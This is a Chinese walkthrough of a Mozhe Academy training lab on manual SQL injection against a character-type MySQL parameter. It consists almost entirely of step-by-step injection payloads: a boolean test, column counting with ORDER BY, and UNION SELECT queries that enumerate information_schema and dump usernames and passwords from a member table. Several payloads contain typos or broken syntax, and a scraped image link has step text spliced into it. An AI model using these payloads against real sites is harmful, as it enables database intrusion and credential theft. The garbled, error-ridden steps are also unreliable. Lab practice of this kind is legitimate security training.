墨者学院SQL手工注入漏洞测试(MySQL数据库字符型）

1 墨者学院SQL手工注入漏洞测试(MySQL数据库字符型）
点击平台停机维护
2 在这个输入框中手注
3 判断是否存在注入点。加’ and 1=2#,页面变化。
会显示如下图片
4 判断字段数。order by 4不报错，为4个字段
![在这里插入图片描述](https://img-blog.****img.cn/20191211142954910.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4u判断位置。union select 1,2,3,4bmV0L3ByaW50ZnpmeQ==,size_16,color_FFFFFF,t_70)5 判断位置。union select 1,2,3,4
墨者学院SQL手工注入漏洞测试(MySQL数据库字符型）
6 判断数据库和用户。 union select 1，database(),user,4

7 判断表名。 union select 1，select(group_concat(table_name) from information_schema.tables where table_schema=databse()),3,4
墨者学院SQL手工注入漏洞测试(MySQL数据库字符型） 8 判断列。 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘stormgroup_member’),3,4%23

墨者学院SQL手工注入漏洞测试(MySQL数据库字符型） 9 获取密码。 union select 1,(select group_concat(password) from stormgroup_member),3,4%23
10 获取用户名。 union select 1,(select group_concat(name) from stormgroup_member),3,4%23
里边就有key

墨者学院SQL手工注入漏洞测试(MySQL数据库字符型）

相关推荐